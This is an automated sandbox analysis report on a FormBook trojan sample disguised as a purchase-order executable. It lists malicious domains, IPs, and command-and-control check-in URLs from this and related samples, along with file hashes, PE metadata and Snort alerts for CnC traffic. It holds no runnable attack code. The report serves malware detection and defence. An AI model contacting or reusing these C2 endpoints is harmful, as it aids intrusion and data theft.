                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.tiro.comPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.goodfont.co.krPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.microexplorer.exe, 00000003.00000000.1779124228.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776990412.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776251589.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.gratiasempirellc.comReferer:explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.yoursweets.online/vr01/explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          http://www.typography.netDPurchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          66.235.200.146
                                                                          		snugandkind.comUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          13.248.169.48
                                                                          		www.owletbaby.shopUnited States
                                                                          		16509AMAZON-02UStrue
                                                                          102.134.40.151
                                                                          		www.mingshengglass.comSouth Africa
                                                                          		328543sun-asnSCtrue
                                                                          198.185.159.144
                                                                          		ext-sq.squarespace.comUnited States
                                                                          		53831SQUARESPACEUSfalse
                                                                          45.76.63.192
                                                                          		studioenginedemo.comUnited States
                                                                          		20473AS-CHOOPAUStrue
                                                                          23.227.38.74
                                                                          		shops.myshopify.comCanada
                                                                          		13335CLOUDFLARENETUStrue
                                                                          172.67.165.166
                                                                          		www.xaqh.infoUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          66.147.240.91
                                                                          		oregonjobs.coUnited States
                                                                          		46606UNIFIEDLAYER-AS-1UStrue

                                                                          General Information

                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1422056
                                                                          Start date and time:2024-04-08 10:01:48 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 12m 4s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Sample name:Purchase Order#23113.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@8/1@11/8
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 167
                                                                          • Number of non-executed functions: 328
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          10:02:47API Interceptor1x Sleep call for process: Purchase Order#23113.exe modified
                                                                          10:02:55API Interceptor9355456x Sleep call for process: explorer.exe modified
                                                                          10:03:30API Interceptor8174238x Sleep call for process: cscript.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          66.235.200.146GQVUENt6FZ.exeGet hashmaliciousFormBookBrowse
                                                                          • www.nooklanding.com/duv2/
                                                                          Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • www.worshipgrounds.com/u68o/?vTcP727h=mL9XaWxGsgpWZqmrS8Ok6Xw9UrbNySSt92uYUQ8LAIyJS7HyfVV5UqrkOL/xCfMhDfOsMhBePBa1xORiQKfo4FaZOye7fgphA2gE27sjCtrRq8XCKw==&pV=jnzt
                                                                          BL copy.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.nooklanding.com/duv2/
                                                                          SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                                                                          • melabur-hartanah.com/wp-login.php
                                                                          Order.exeGet hashmaliciousFormBookBrowse
                                                                          • www.theclayrose.com/cs82/?K4-4H=xR04qnTh8&RlW=WHX1ehF8p5KHI8VEh14zcP7E81Pz68+6utYdjI3bj2bn5sREOD3t+3WNgmlQ/MedSvb1
                                                                          Product_Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                          • www.leilah.org/tphs/?k8J0p=uegq9C93tHldtLfmGa9OfF5WehKglDTCnOBa3Tv55g3iAgpxQ8UOid/I7SSSlx9rDk2Q7TLH1AOyaY29dKc5lhcKqwrz5dEnLg==&MpTl=KTct
                                                                          DHL_On_Demand_Delivery.exeGet hashmaliciousFormBookBrowse
                                                                          • www.tearsandrise.com/c6nd/?tLHdfha=RU9zx7ZQ1N0szg3JJvaMhhPcPNMgdZhgn7OirTFMAWN3hnP12PxWz5lkThN73WijdBjk/4rJ1s1sovAMnDHw1xRhCmByqyJkMg==&o4=5HQ4hFjxThDtIpr0
                                                                          ins.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.tearsandrise.com/rdws/?PdH=AJQ8OvCp&6J2Xdf=UqrjEVy8F0Obqe7xOZEDim1Gqc3+LgH61AduycYB21RSmp6z6rGeF52nJSqVbuakF3q24hgxYHBVFkoZau/NsFbY0knZJttwQw==
                                                                          INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                          • www.creditworld.online/thnk/?AJ=A+i+pfxKorXX2s72fH0uI/N1Ub4/CQuMaoCKM9VeYanaGau4h8jvqzIZClQIcwZ5uPKhsns0zPRlz3U1QwORhQcvij0ACqt5j2EWKJ2NzJz6&2B=Qz_lGQawfvmG6
                                                                          RFQ_GEC18.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.tearsandrise.com/rdws/?nfwL=XzGp&DP54BV=UqrjEVy8F0Obqe7xOZEDim1Gqc3+LgH61AduycYB21RSmp6z6rGeF52nJSqVbuakF3q24hgxYHBVFkoZau/NsFbY0knZJttwQw==
                                                                          13.248.169.48Quotation approved 02887.exeGet hashmaliciousFormBookBrowse
                                                                          • www.kidscircle.shop/vr01/?W6=PLKcE8wdvB3+u+s+4uL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pzqSZumme1A/&TlPt=JVlpdVvpc05H2Z
                                                                          KY9D34Qh8d.exeGet hashmaliciousUnknownBrowse
                                                                          • homepagetechnology.com/pma/
                                                                          RFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • www.kidscircle.shop/vr01/?vRfX=lhL0WFfxrF_LiLF&CZjpOVd=PLKcE8wdvB3+u+s+4uL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pzqSZumme1A/
                                                                          Batteriforeningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.promoplace.online/m9so/
                                                                          1AIemYSAZy.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                                                          • posiklan.com/pma/
                                                                          MCYq2AqNU0.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                          • acidvision.com/admin/
                                                                          Documento de confirmacion de orden de compra OC 1580070060.exeGet hashmaliciousFormBookBrowse
                                                                          • www.gourmetfoodfactory.com/pz08/?mzrPV4R=YXUHyuzV9xL0ASV6xbcNd1qnDMoomLXuS1YqahB0JTuNzOlGIgIKnXH69pHGKPL64RNK&Rl=8pFP0r98Chvt5p5P
                                                                          http://borg.wtfGet hashmaliciousUnknownBrowse
                                                                          • borg.wtf/
                                                                          O4FR7BTmYq.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.linktotechnologies.com/cg86/
                                                                          Solicitud de precio (ORDEN DE COMPRA A4-000004024).bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • www.yxys.xyz/hi5f/?kzrxPp=cgeHYOWul7i1U2UxKWBUstKkqz+XHk6jUl2uFtikaoff3qvRFshV6rzyVgFc5XCkRy1w&9rh=_hrX_

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.xaqh.infoRFQ RT1120 #10324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 104.21.16.9
                                                                          shops.myshopify.comSecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 23.227.38.74
                                                                          narudba Rs211-24400.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          GSO3357.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          SecuriteInfo.com.Exploit.ShellCode.69.18092.2332.rtfGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          PO-31789R3WY-10_docx.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          fvdsoH9LQneIhQP.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 23.227.38.74
                                                                          General Specifications - INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 23.227.38.74
                                                                          Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 23.227.38.74
                                                                          ext-sq.squarespace.com0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          Dokument-99373.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          LF20240228.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          Factura379292.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 198.185.159.144
                                                                          GSO3357.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          D05285734 DHL.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          SQUARESPACEUS0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          SecuriteInfo.com.W32.AutoIt.IJ.gen.Eldorado.2874.1070.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          mrPTE618YB.exeGet hashmaliciousPureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          https://duck-mushroom-fwry.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                          • 198.185.159.177
                                                                          GSO3357.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          General Specification -INVACO PVT.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          iU3WGoA77BdiFdA.exeGet hashmaliciousFormBookBrowse
                                                                          • 198.185.159.144
                                                                          https://reed-cat-fb53.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                          • 198.185.159.177
                                                                          PO663636.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                          • 198.185.159.144
                                                                          AMAZON-02USdVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                                                          • 76.76.21.123
                                                                          3PhhXne1YD.exeGet hashmaliciousFormBookBrowse
                                                                          • 44.227.76.166
                                                                          Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                          • 13.228.81.39
                                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                                          • 75.2.26.164
                                                                          http://rhb.wigitally.com/interx/trackerGet hashmaliciousUnknownBrowse
                                                                          • 52.76.69.246
                                                                          d7Jv5EG8Q1.elfGet hashmaliciousMiraiBrowse
                                                                          • 34.249.145.219
                                                                          SecuriteInfo.com.Linux.Siggen.9999.23440.5437.elfGet hashmaliciousGafgytBrowse
                                                                          • 34.249.145.219
                                                                          FreeTemplates_46069682.msiGet hashmaliciousUnknownBrowse
                                                                          • 13.32.87.98
                                                                          lSf5ZUqdZz.elfGet hashmaliciousMiraiBrowse
                                                                          • 34.249.145.219
                                                                          TOObMLc6ag.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                          • 34.249.145.219
                                                                          sun-asnSC43ZYohKtbk.elfGet hashmaliciousMiraiBrowse
                                                                          • 45.221.118.203
                                                                          PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbsGet hashmaliciousFormBookBrowse
                                                                          • 45.221.114.42
                                                                          2022-571-GLS.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.221.114.43
                                                                          Swift.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.221.114.43
                                                                          bk.mpsl-20220930-0404.elfGet hashmaliciousMiraiBrowse
                                                                          • 102.134.57.97
                                                                          v22-003920.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 45.221.109.201
                                                                          EtAT4sBTxbGet hashmaliciousMiraiBrowse
                                                                          • 45.221.118.202
                                                                          arm-20220318-0536Get hashmaliciousMirai MoobotBrowse
                                                                          • 45.221.118.204
                                                                          Payment Copy.exeGet hashmaliciousFormBookBrowse
                                                                          • 102.134.51.19
                                                                          Hilix.armGet hashmaliciousMiraiBrowse
                                                                          • 45.221.118.207
                                                                          CLOUDFLARENETUS0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                          • 172.67.220.25
                                                                          PO#240.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.27.85
                                                                          Shipping Docs.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.74.152
                                                                          8C3H9zQgK2.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.21.80.13
                                                                          CA8nLhW9fA.exeGet hashmaliciousFormBookBrowse
                                                                          • 66.235.200.22
                                                                          V2i5WDBNV7.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.12.205
                                                                          SecuriteInfo.com.Win32.PWSX-gen.28384.29794.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 104.26.13.205
                                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                                          • 104.21.62.22
                                                                          240330_unpackedGet hashmaliciousUnknownBrowse
                                                                          • 104.21.62.22

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order#23113.exe.log

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\Purchase Order#23113.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1216
                                                                          Entropy (8bit):5.34331486778365
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.953634631965206
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:Purchase Order#23113.exe
                                                                          File size:651'272 bytes
                                                                          MD5:fa3e92f061246f3b1625e6f8b8291836
                                                                          SHA1:a58763445fe7359a7b0a527ec1dc00ecdc7337f0
                                                                          SHA256:ca1d2592c9726d9e3a6a57c55ac57b40d9aa3bc501393a40962afd5bd4946433
                                                                          SHA512:43b5abdf350150a7b150e4b5f44aefddf684757831650907f688f5cb600a2f151529a76a96d9279de01a890de0d4bbadf378f32ef8fee127f4908ead1e02d7b7
                                                                          SSDEEP:12288:VatwB1oVeonUYMjNczF8nmmE15zXl1l7Vu3GG2uSZ8HHke6otiMpdwnzU8yzXyD6:Etio5NeNcp8nmFX1c3nhSZ8nJXtiMwnO
                                                                          TLSH:60D412526338AFD0CA78CFF69934A5516BF364071830EEAA2DEF30DD1525B902A7161F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:...............0.................. ........@.. ....................... ............@................................

                                                                          File Icon

                                                                          Icon Hash:90cececece8e8eb0

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x49cd0e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0xDB3AE2F9 [Sun Jul 21 05:58:17 2086 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Authenticode Signature

                                                                          Signature Valid:false
                                                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                          Error Number:-2146869232
                                                                          Not Before, Not After
                                                                          • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                          Subject Chain
                                                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                          Version:3
                                                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          aaa
                                                                          cmp byte ptr [54433552h+esi], dh
                                                                          inc edx
                                                                          inc esp
                                                                          xor eax, 00000054h
                                                                          inc edx
                                                                          xor eax, 35504A42h
                                                                          inc edi
                                                                          cmp byte ptr [esi+00h], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9ccbb0x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9e0000x694.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x9ba000x3608
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x9b3340x70.text
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x9ad340x9ae00996ceaead858a769731f01d18ec37bb5False0.9556692645278451data7.961859461470405IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x9e0000x6940x8008c6f4d5cda789327928bc72a9969c967False0.3671875data3.6336147596979593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0xa00000xc0x200491bd5371bb376879893bc7aed59dca8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x9e0900x404data0.4280155642023346
                                                                          RT_MANIFEST0x9e4a40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          04/08/24-10:06:49.944631TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.466.147.240.91
                                                                          04/08/24-10:06:29.007960TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.445.76.63.192
                                                                          04/08/24-10:03:45.371301TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.4102.134.40.151
